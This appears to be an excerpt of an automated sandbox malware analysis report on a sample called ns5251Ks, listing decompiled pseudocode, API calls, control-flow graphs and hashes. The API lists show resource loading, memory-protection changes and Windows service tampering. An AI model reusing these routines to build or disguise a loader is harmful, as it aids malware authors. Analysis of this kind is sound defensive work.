                                                0x00401cd2
                                                0x00401cd4
                                                0x00000000
                                                0x00000000
                                                0x00401cd6
                                                0x00401cd8
                                                0x00401cec
                                                0x00401cec
                                                0x00401cda
                                                0x00401cda
                                                0x00401cdd
                                                0x00401ce0
                                                0x00000000
                                                0x00401ce2
                                                0x00401ce2
                                                0x00401ce5
                                                0x00401ce8
                                                0x00401cea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401cea
                                                0x00401ce0
                                                0x00401cf5
                                                0x00401cf5
                                                0x00401cf7
                                                0x00000000
                                                0x00401cf9
                                                0x00401d02
                                                0x00401d07
                                                0x00401d09
                                                0x00401d10
                                                0x00401d1d
                                                0x00401d22
                                                0x00401d25
                                                0x00401d27
                                                0x00401d30
                                                0x00401d30
                                                0x00401d32
                                                0x00401d34
                                                0x00000000
                                                0x00000000
                                                0x00401d36
                                                0x00401d38
                                                0x00401d4c
                                                0x00401d4c
                                                0x00401d3a
                                                0x00401d3a
                                                0x00401d3d
                                                0x00401d40
                                                0x00000000
                                                0x00401d42
                                                0x00401d42
                                                0x00401d45
                                                0x00401d48
                                                0x00401d4a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401d4a
                                                0x00401d40
                                                0x00401d55
                                                0x00401d55
                                                0x00401d57
                                                0x00000000
                                                0x00401d5d
                                                0x00401d6a
                                                0x00401d6f
                                                0x00401d72
                                                0x00401d74
                                                0x00401d80
                                                0x00401d80
                                                0x00401d82
                                                0x00401d84
                                                0x00000000
                                                0x00000000
                                                0x00401d86
                                                0x00401d88
                                                0x00401d9c
                                                0x00401d9c
                                                0x00401d8a
                                                0x00401d8a
                                                0x00401d8d
                                                0x00401d90
                                                0x00000000
                                                0x00401d92
                                                0x00401d92
                                                0x00401d95
                                                0x00401d98
                                                0x00401d9a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401d9a
                                                0x00401d90
                                                0x00401da5
                                                0x00401da5
                                                0x00401da7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401da7
                                                0x00401da0
                                                0x00401da2
                                                0x00000000
                                                0x00401da2
                                                0x00000000
                                                0x00401d57
                                                0x00401d50
                                                0x00401d52
                                                0x00000000
                                                0x00401dad
                                                0x00401db6
                                                0x00401dbb
                                                0x00401dbb
                                                0x00401d10
                                                0x00000000
                                                0x00401d09
                                                0x00000000
                                                0x00401cf7
                                                0x00401cf0
                                                0x00401cf2
                                                0x00000000
                                                0x00401c9c
                                                0x00401c9c
                                                0x00401c9d
                                                0x00401caf
                                                0x00401caf
                                                0x00000000
                                                0x00401c9a
                                                0x00401c93
                                                0x00401c95
                                                0x00000000
                                                0x00401c95
                                                0x00401c4f
                                                0x00000000

                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 004019FD
                                                • _getenv.LIBCMT ref: 00401ABA
                                                • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                • Module32First.KERNEL32 ref: 00401C48
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                • Module32Next.KERNEL32 ref: 00401D02
                                                • Module32Next.KERNEL32 ref: 00401DB6
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                • _malloc.LIBCMT ref: 00401EBA
                                                • _memset.LIBCMT ref: 00401EDD
                                                • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                • API String ID: 2366190142-2962942730
                                                • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 152 4018f0-4018fa 153 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 152->153 154 4018fc-401900 152->154 157 401940-401949 GetLastError 153->157 158 401996-40199a 153->158 159 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 157->159 160 40198d-40198f 157->160 159->160 160->158 162 401991 call 401030 160->162 162->158
                                                C-Code - Quality: 84%
                                                			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                				void* __ebx;
                                                				void* __ebp;
                                                				signed int _t12;
                                                				void* _t21;
                                                				int _t25;
                                                				void* _t30;
                                                				int _t32;
                                                				char* _t35;
                                                
                                                				_t21 = __edx;
                                                				_t35 = _a4;
                                                				_t17 = __ecx;
                                                				if(_t35 != 0) {
                                                					_t25 = lstrlenA(_t35) + 1;
                                                					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                					asm("sbb esi, esi");
                                                					_t30 =  ~_t12 + 1;
                                                					if(_t30 != 0) {
                                                						_t12 = GetLastError();
                                                						if(_t12 == 0x7a) {
                                                							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                							asm("sbb esi, esi");
                                                							_t30 =  ~_t12 + 1;
                                                						}
                                                						if(_t30 != 0) {
                                                							_t12 = E00401030();
                                                						}
                                                					}
                                                					return _t12;
                                                				} else {
                                                					 *__ecx = _t35;
                                                					return __eax;
                                                				}
                                                			}











                                                0x004018f0
                                                0x004018f2
                                                0x004018f6
                                                0x004018fa
                                                0x00401917
                                                0x0040191a
                                                0x0040192f
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x00401940
                                                0x00401949
                                                0x0040195e
                                                0x0040196b
                                                0x00401980
                                                0x0040198a
                                                0x0040198c
                                                0x0040198c
                                                0x0040198f
                                                0x00401991
                                                0x00401991
                                                0x0040198f
                                                0x0040199a
                                                0x004018fc
                                                0x004018fc
                                                0x00401900
                                                0x00401900

                                                APIs
                                                • lstrlenA.KERNEL32(?), ref: 00401906
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                • GetLastError.KERNEL32 ref: 00401940
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                • String ID:
                                                • API String ID: 3322701435-0
                                                • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 165 40af66-40af6e 166 40af7d-40af88 call 40b84d 165->166 169 40af70-40af7b call 40d2e3 166->169 170 40af8a-40af8b 166->170 169->166 173 40af8c-40af98 169->173 174 40afb3-40afca call 40af49 call 40cd39 173->174 175 40af9a-40afb2 call 40aefc call 40d2bd 173->175 175->174
                                                C-Code - Quality: 63%
                                                			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                				signed int _v4;
                                                				signed int _v16;
                                                				signed int _v40;
                                                				void* _t14;
                                                				signed int _t15;
                                                				intOrPtr* _t21;
                                                				signed int _t24;
                                                				void* _t28;
                                                				void* _t39;
                                                				void* _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t51;
                                                
                                                				_t40 = __edi;
                                                				_t28 = __ebx;
                                                				_t45 = _t51;
                                                				while(1) {
                                                					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                					if(_t14 != 0) {
                                                						break;
                                                					}
                                                					_t15 = E0040D2E3(_a4);
                                                					__eflags = _t15;
                                                					if(_t15 == 0) {
                                                						__eflags =  *0x423490 & 0x00000001;
                                                						if(( *0x423490 & 0x00000001) == 0) {
                                                							 *0x423490 =  *0x423490 | 0x00000001;
                                                							__eflags =  *0x423490;
                                                							E0040AEFC(0x423484);
                                                							E0040D2BD( *0x423490, 0x41a704);
                                                						}
                                                						E0040AF49( &_v16, 0x423484);
                                                						E0040CD39( &_v16, 0x420fa4);
                                                						asm("int3");
                                                						_t47 = _t45;
                                                						_push(_t47);
                                                						_push(0xc);
                                                						_push(0x420ff8);
                                                						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                						_t42 = _v4;
                                                						__eflags = _t42;
                                                						if(_t42 != 0) {
                                                							__eflags =  *0x4250b0 - 3;
                                                							if( *0x4250b0 != 3) {
                                                								_push(_t42);
                                                								goto L16;
                                                							} else {
                                                								E0040D6E0(_t28, 4);
                                                								_v16 = _v16 & 0x00000000;
                                                								_t24 = E0040D713(_t42);
                                                								_v40 = _t24;
                                                								__eflags = _t24;
                                                								if(_t24 != 0) {
                                                									_push(_t42);
                                                									_push(_t24);
                                                									E0040D743();
                                                								}
                                                								_v16 = 0xfffffffe;
                                                								_t19 = E0040B70B();
                                                								__eflags = _v40;
                                                								if(_v40 == 0) {
                                                									_push(_v4);
                                                									L16:
                                                									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                									if(__eflags == 0) {
                                                										_t21 = E0040BFC1(__eflags);
                                                										 *_t21 = E0040BF7F(GetLastError());
                                                									}
                                                								}
                                                							}
                                                						}
                                                						return E0040E21D(_t19);
                                                					} else {
                                                						continue;
                                                					}
                                                					L19:
                                                				}
                                                				return _t14;
                                                				goto L19;
                                                			}

















                                                0x0040af66
                                                0x0040af66
                                                0x0040af69
                                                0x0040af7d
                                                0x0040af80
                                                0x0040af88
                                                0x00000000
                                                0x00000000
                                                0x0040af73
                                                0x0040af79
                                                0x0040af7b
                                                0x0040af8c
                                                0x0040af98
                                                0x0040af9a
                                                0x0040af9a
                                                0x0040afa3
                                                0x0040afad
                                                0x0040afb2
                                                0x0040afb7
                                                0x0040afc5
                                                0x0040afca
                                                0x0040afd0
                                                0x0040aec2
                                                0x0040b6b5
                                                0x0040b6b7
                                                0x0040b6bc
                                                0x0040b6c1
                                                0x0040b6c4
                                                0x0040b6c6
                                                0x0040b6c8
                                                0x0040b6cf
                                                0x0040b714
                                                0x00000000
                                                0x0040b6d1
                                                0x0040b6d3
                                                0x0040b6d9
                                                0x0040b6de
                                                0x0040b6e4
                                                0x0040b6e7
                                                0x0040b6e9
                                                0x0040b6eb
                                                0x0040b6ec
                                                0x0040b6ed
                                                0x0040b6f3
                                                0x0040b6f4
                                                0x0040b6fb
                                                0x0040b700
                                                0x0040b704
                                                0x0040b706
                                                0x0040b715
                                                0x0040b723
                                                0x0040b725
                                                0x0040b727
                                                0x0040b73a
                                                0x0040b73c
                                                0x0040b725
                                                0x0040b704
                                                0x0040b6cf
                                                0x0040b742
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040af7b
                                                0x0040af8b
                                                0x00000000

                                                APIs
                                                • _malloc.LIBCMT ref: 0040AF80
                                                  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                • String ID:
                                                • API String ID: 1411284514-0
                                                • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 184 2e17766-2e1777f 185 2e17781-2e17783 184->185 186 2e17785 185->186 187 2e1778a-2e17796 CreateToolhelp32Snapshot 185->187 186->187 188 2e177a6-2e177b3 Module32First 187->188 189 2e17798-2e1779e 187->189 190 2e177b5-2e177b6 call 2e17425 188->190 191 2e177bc-2e177c4 188->191 189->188 195 2e177a0-2e177a4 189->195 196 2e177bb 190->196 195->185 195->188 196->191
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E1778E
                                                • Module32First.KERNEL32(00000000,00000224), ref: 02E177AE
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E16000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2e16000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 00b533b821e81ca0d74444cb0a98b10a0a329522550250cfc95f5f0d965a904c
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: A6F062315407106BE7203AF5A88DF6EB6E8AF89B2AF145538F642D10C0DB70E8454A61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 197 40e7ee-40e7f6 call 40e7c3 199 40e7fb-40e7ff ExitProcess 197->199
                                                C-Code - Quality: 100%
                                                			E0040E7EE(int _a4) {
                                                
                                                				E0040E7C3(_a4); // executed
                                                				ExitProcess(_a4);
                                                			}



                                                0x0040e7f6
                                                0x0040e7ff

                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                • ExitProcess.KERNEL32 ref: 0040E7FF
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0
                                                • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 200 2dca1a8-2dca232 202 2dca26b-2dca28d 200->202 203 2dca234-2dca23e 200->203 210 2dca28f-2dca29c 202->210 211 2dca2c9-2dca2ea 202->211 203->202 204 2dca240-2dca242 203->204 205 2dca244-2dca24e 204->205 206 2dca265-2dca268 204->206 208 2dca250 205->208 209 2dca252-2dca261 205->209 206->202 208->209 209->209 212 2dca263 209->212 210->211 213 2dca29e-2dca2a0 210->213 217 2dca2ec-2dca2f6 211->217 218 2dca323-2dca345 211->218 212->206 215 2dca2a2-2dca2ac 213->215 216 2dca2c3-2dca2c6 213->216 219 2dca2ae 215->219 220 2dca2b0-2dca2bf 215->220 216->211 217->218 222 2dca2f8-2dca2fa 217->222 226 2dca347-2dca354 218->226 227 2dca381-2dca3a2 218->227 219->220 220->220 221 2dca2c1 220->221 221->216 223 2dca2fc-2dca306 222->223 224 2dca31d-2dca320 222->224 228 2dca308 223->228 229 2dca30a-2dca319 223->229 224->218 226->227 230 2dca356-2dca358 226->230 237 2dca3db-2dca3fd 227->237 238 2dca3a4-2dca3ae 227->238 228->229 229->229 231 2dca31b 229->231 232 2dca35a-2dca364 230->232 233 2dca37b-2dca37e 230->233 231->224 235 2dca368-2dca377 232->235 236 2dca366 232->236 233->227 235->235 239 2dca379 235->239 236->235 244 2dca3ff-2dca40c 237->244 245 2dca439-2dca4b0 ChangeServiceConfigA 237->245 238->237 240 2dca3b0-2dca3b2 238->240 239->233 242 2dca3b4-2dca3be 240->242 243 2dca3d5-2dca3d8 240->243 246 2dca3c0 242->246 247 2dca3c2-2dca3d1 242->247 243->237 244->245 248 2dca40e-2dca410 244->248 255 2dca4b9-2dca4f8 245->255 256 2dca4b2-2dca4b8 245->256 246->247 247->247 249 2dca3d3 247->249 250 2dca412-2dca41c 248->250 251 2dca433-2dca436 248->251 249->243 253 2dca41e 250->253 254 2dca420-2dca42f 250->254 251->245 253->254 254->254 258 2dca431 254->258 260 2dca508-2dca50c 255->260 261 2dca4fa-2dca4fe 255->261 256->255 258->251 263 2dca51c-2dca520 260->263 264 2dca50e-2dca512 260->264 261->260 262 2dca500 261->262 262->260 266 2dca530-2dca534 263->266 267 2dca522-2dca526 263->267 264->263 265 2dca514 264->265 265->263 269 2dca544-2dca548 266->269 270 2dca536-2dca53a 266->270 267->266 268 2dca528 267->268 268->266 272 2dca558-2dca55c 269->272 273 2dca54a-2dca54e 269->273 270->269 271 2dca53c 270->271 271->269 275 2dca56c 272->275 276 2dca55e-2dca562 272->276 273->272 274 2dca550 273->274 274->272 276->275 277 2dca564 276->277 277->275
                                                APIs
                                                • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 02DCA4A0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ChangeConfigService
                                                • String ID:
                                                • API String ID: 3849694230-0
                                                • Opcode ID: 6cb6ce582501a7c987dbde9e5b7f26c4151b87bd7583d214d4146cd4792c04e3
                                                • Instruction ID: 49526a9c7baf40568efc4075d07a681cee13df45ea721938a9771b093f7116e6
                                                • Opcode Fuzzy Hash: 6cb6ce582501a7c987dbde9e5b7f26c4151b87bd7583d214d4146cd4792c04e3
                                                • Instruction Fuzzy Hash: 41C11771D1061E8FDB10CFA8D9857AEBBF1BF48314F248629E859A7394DB749881CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 278 2dc99e8-2dc9a49 280 2dc9a4b-2dc9a55 278->280 281 2dc9a82-2dc9ad2 OpenServiceA 278->281 280->281 282 2dc9a57-2dc9a59 280->282 288 2dc9adb-2dc9b0c 281->288 289 2dc9ad4-2dc9ada 281->289 283 2dc9a7c-2dc9a7f 282->283 284 2dc9a5b-2dc9a65 282->284 283->281 286 2dc9a69-2dc9a78 284->286 287 2dc9a67 284->287 286->286 290 2dc9a7a 286->290 287->286 293 2dc9b1c 288->293 294 2dc9b0e-2dc9b12 288->294 289->288 290->283 294->293 295 2dc9b14 294->295 295->293
                                                APIs
                                                • OpenServiceA.ADVAPI32(?,?,?), ref: 02DC9AC2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: OpenService
                                                • String ID:
                                                • API String ID: 3098006287-0
                                                • Opcode ID: c7a3bb88cf015c8e2f0784cc6365ba5128ec2826c7d7c5341c2a469a9a33c143
                                                • Instruction ID: 46afeb9518970f12424087402df7e1f30d2135cbfb61c54b0943c87316af1c25
                                                • Opcode Fuzzy Hash: c7a3bb88cf015c8e2f0784cc6365ba5128ec2826c7d7c5341c2a469a9a33c143
                                                • Instruction Fuzzy Hash: 923163B0D042099FDB10CFA9C894BEEBBF1BB48314F248529E815EB340D774A842CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 296 2dc9920-2dc996f 298 2dc9977-2dc997b 296->298 299 2dc9971-2dc9974 296->299 300 2dc997d-2dc9980 298->300 301 2dc9983-2dc99b2 OpenSCManagerW 298->301 299->298 300->301 302 2dc99bb-2dc99cf 301->302 303 2dc99b4-2dc99ba 301->303 303->302
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 02DC99A5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ManagerOpen
                                                • String ID:
                                                • API String ID: 1889721586-0
                                                • Opcode ID: 2b00acc47ee16b9b6d084c984ac2d37c9f9165570db9297361382ce10397dd6d
                                                • Instruction ID: 07c8a8a1d2bdd08f0221cf1f6edc6390a3fd2dcddca3d76045c9268b97ea7d0d
                                                • Opcode Fuzzy Hash: 2b00acc47ee16b9b6d084c984ac2d37c9f9165570db9297361382ce10397dd6d
                                                • Instruction Fuzzy Hash: ED2115B5C002199FCB14CF9AD984BDEFBF4FB88714F14855AD808AB344D7749940CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 305 2dc9180-2dc9201 VirtualProtect 308 2dc920a-2dc922f 305->308 309 2dc9203-2dc9209 305->309 309->308
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02DC91F4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 139394f9a7e4a5b9a128d1177098a730609c02509faffb012f19e0993919484a
                                                • Instruction ID: 925ced1864fec463f120371345a5907fdad33124910dacb5ae8c10c73a13f0a8
                                                • Opcode Fuzzy Hash: 139394f9a7e4a5b9a128d1177098a730609c02509faffb012f19e0993919484a
                                                • Instruction Fuzzy Hash: 3011E2B1D002099FDB10DFAAC984AAEFBF4AB48314F14842AE419A7240C779A945CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 313 2dca0e8-2dca165 ControlService 315 2dca16e-2dca18f 313->315 316 2dca167-2dca16d 313->316 316->315
                                                APIs
                                                • ControlService.ADVAPI32(?,?,?), ref: 02DCA158
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ControlService
                                                • String ID:
                                                • API String ID: 253159669-0
                                                • Opcode ID: 8e977ac1bc82bbdfbd1861377ade366d4cc5bff406f58d7e166d357ab63cd044
                                                • Instruction ID: d98e6dd25cfda0f46e5f8371f1918beb5a594b4ff96cecb99aa107df9028446a
                                                • Opcode Fuzzy Hash: 8e977ac1bc82bbdfbd1861377ade366d4cc5bff406f58d7e166d357ab63cd044
                                                • Instruction Fuzzy Hash: 4911E2B19006099FDB10CF9AC984BDEFBF4FB48324F10842AE458A7340D378AA45CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 318 2dc9350-2dc93bf FindCloseChangeNotification 321 2dc93c8-2dc93ed 318->321 322 2dc93c1-2dc93c7 318->322 322->321
                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE ref: 02DC93B2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 77820a41f70356b4f9ee9e8ce857594bc1912db2f0e472229cddf2dbb66a23d7
                                                • Instruction ID: 9daf4db3ea52372555e805d5904132809fc74615c0e1818949bedaad68dec50d
                                                • Opcode Fuzzy Hash: 77820a41f70356b4f9ee9e8ce857594bc1912db2f0e472229cddf2dbb66a23d7
                                                • Instruction Fuzzy Hash: 711116B19003498FDB10DFAAC5447EEBBF4AB48314F24841AD419A7240C779A945CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
